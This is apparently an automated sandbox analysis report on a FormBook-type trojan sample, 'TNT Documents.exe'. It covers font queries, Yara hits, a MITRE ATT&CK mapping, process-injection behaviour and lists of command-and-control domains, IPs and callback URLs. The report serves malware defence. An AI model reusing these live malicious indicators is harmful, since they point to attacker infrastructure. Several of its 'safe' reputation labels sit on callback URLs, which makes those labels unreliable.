Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

Behavior Graph ID: 532859 | Sample: TNT Documents.exe | Startdate: 02/12/2021 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.viavelleiloes.online; www.projectcentered.com; 5 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
  -> TNT Documents.exe (started)
       Dropped file: C:\Users\user\...\TNT Documents.exe.log, ASCII
       Signature: Injects a PE file into a foreign processes
       -> TNT Documents.exe (started)
       -> TNT Documents.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 DNS/IP: metronixmedical.com 119.18.54.99, 49820, 80 PUBLIC-DOMAIN-REGISTRYUS India; cortepuroiberico.com 51.255.30.106, 49794, 80 OVHFR France; 5 other IPs or domains
                 Signature: System process connects to network (likely due to code injection or exploit)
                 -> mstsc.exe (started)
                      Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)
                           -> conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
TNT Documents.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
TNT Documents.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
7.2.TNT Documents.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.TNT Documents.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.TNT Documents.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.TNT Documents.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
coached.info | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.fontbureau.comI.TTF | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.sajatypeworks.comus4 | 0% | Avira URL Cloud | safe
http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnar | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn9 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/soft | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.founder.c | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.founder.com.cn/cnG | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
www.floridanratraining.com/how6/ | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.comx | 0% | Avira URL Cloud | safe
http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/slnt | 0% | Avira URL Cloud | safe
http://www.urwpp.de2 | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
http://www.fontbureau.comF( | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cna | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/( | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.coma | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.founder.com.cn/cnaX | 0% | Avira URL Cloud | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.fontbureau.com= | 0% | Avira URL Cloud | safe
http://www.fontbureau.comcomo? | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/M | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/F | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fontbureau.comd | 0% | URL Reputation | safe
http://www.fonts.comX | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.monotype. | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/.comp | 0% | Avira URL Cloud | safe
http://www.tiro.comU | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd | 100% | Avira URL Cloud | malware
http://www.urwpp.der | 0% | Avira URL Cloud | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.zhongyicts.com.cno. | 0% | URL Reputation | safe
http://www.fontbureau.comals | 0% | URL Reputation | safe
http://www.tiro.comic | 0% | URL Reputation | safe
http://www.fontbureau.comitud | 0% | URL Reputation | safe
http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
metronixmedical.com | 119.18.54.99 | true | true |  | unknown
www.functionalsoft.com | 74.208.236.210 | true | false |  | unknown
coached.info | 34.102.136.180 | true | false |  | unknown
cortepuroiberico.com | 51.255.30.106 | true | true |  | unknown
www.specialtyplastics.online | 209.17.116.163 | true | true |  | unknown
projectcentered.com | 158.69.116.156 | true | true |  | unknown
www.pirosconsulting.com | unknown | unknown | true |  | unknown
www.metronixmedical.com | unknown | unknown | true |  | unknown
www.pentagonpublishers.com | unknown | unknown | true |  | unknown
www.floridanratraining.com | unknown | unknown | true |  | unknown
www.viavelleiloes.online | unknown | unknown | true |  | unknown
www.cortepuroiberico.com | unknown | unknown | true |  | unknown
www.coached.info | unknown | unknown | true |  | unknown
www.projectcentered.com | unknown | unknown | true |  | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
